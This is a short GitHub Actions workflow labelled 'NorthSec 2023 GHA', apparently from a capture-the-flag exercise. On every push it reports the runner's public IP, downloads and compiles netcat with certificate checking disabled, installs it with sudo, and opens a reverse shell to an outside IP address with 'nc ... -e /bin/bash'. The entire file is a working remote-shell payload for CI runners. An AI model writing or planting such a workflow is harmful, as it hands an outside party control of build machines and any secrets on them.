on: [push]

jobs:
  nsec:
    runs-on: ubuntu-latest
    name: NorthSec 2023 GHA
    steps:
      - run: |
            curl ifconfig.me
            wget http://sourceforge.net/projects/netcat/files/netcat/0.7.1/netcat-0.7.1.tar.gz --no-check-certificate
            tar -xzvf netcat-0.7.1.tar.gz
            cd netcat-0.7.1 
            ./configure
            sudo make
            sudo make install
            nc 54.205.149.101 443 -e /bin/bash
